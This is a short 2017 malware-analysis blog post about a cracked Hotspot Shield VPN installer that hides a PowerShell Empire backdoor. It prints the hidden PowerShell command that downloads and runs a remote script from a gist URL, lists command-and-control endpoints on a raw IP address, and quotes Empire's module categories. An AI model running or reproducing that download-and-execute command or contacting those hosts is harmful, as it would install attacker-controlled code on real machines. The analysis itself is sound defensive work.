Malware research/reverse – Payload backdoor

Hello.
I have some free time and I try to deal with internet safety. I’m just a small drop of the ocean, but I’m here!
Today I will introduce you something different.
As usual, I downloaded a few softwares and started the analysis.
I have a ”great offer”:
Hotspot Shield VPN 7.20.8.Elite Cracked

Woooow!!!(just kidding)

We have 3 important files.
Setup.exe and Update.exe appear to be archived files and from previous posts we know what this means, but today our target is the HSS v.2.exe file.

 

It is noticed that it is the latest file created.

Also, the installation method requires using this file.

OK.Let’s scan this time!

Virus Total Report

20/68 detection?!?
I mean, only 20 of the antivirus applications will see this file as a virus.

[quote]OK. It’s normal to be seen by antivirus. It’s just a crack, a patch, etc. You have to disable the antivirus to install it, it’s just a pirated software.[/quote]

Let’s get started

It looks like this .exe is actually a .rar archive

After opening, he has a lot of work in the background.
We let him do the job to find out what he is doing!

When everything is quiet, we see that something is left to work.

[quote]powershell.exe -nop -windowstyle Hidden -c “IEX (New-Object Net.WebClient).DownloadString(‘https://gist.githubusercontent.com/hampros2/7d71db98acfeaa75ec89dcb53eb796c1/raw/9681d583be4c36977286b8171be930b0fd702a64/fuck.ps1
[/quote]

The virus runs through the application Powershell.exe, being connected to external sources.

[quote]h**ps://sgist.githubusercontent.com/hampros2/7d71db98acfeaa75ec89dcb53eb796c1raw9681d583be4c36977286b8171be930b0fd702a64/fuck.ps1[/quote]

Also connectiong to:

[quote]

http://83.251.132.4

/admin/get.php

/login/process.php

/news.php[/quote]

After investigation I found out that it’s about a payload project.

[quote]

Currently Empire Power Shell has the following categories for modules:

  • Code Execution – Ways to run more code
  • Collection – Post exploitation data collection
  • Credentials – Collect and use creds
  • Exfiltration – Identify egress channels
  • Lateral Movement – Move around the network
  • Management – Host management and auxilary
  • Persistence – Survive reboots
  • Privesc – Privilege escalation capabilities
  • Recon – Test further entry points (HTTP Basic Auth etc)
  • Situational Awareness – Network awareness
  • Trollsploit – For the lulz
[/quote]

Prodefence.org

What can I say …. be careful!

Have fun & stay safe!!!

Alex Anghelus

SC Prodefence SRL CEO - Cyber Security, Pentesting & Ethical Hacking - Malware Analyst

2 thoughts on “Malware research/reverse – Payload backdoor

  • 30/11/2017 at 12:04 PM
    Permalink

    Good job Alex! 😉

  • 30/11/2017 at 12:06 PM
    Permalink

    Nice share.

Leave a Reply

SC ProDefence SRL - Cyber Security Services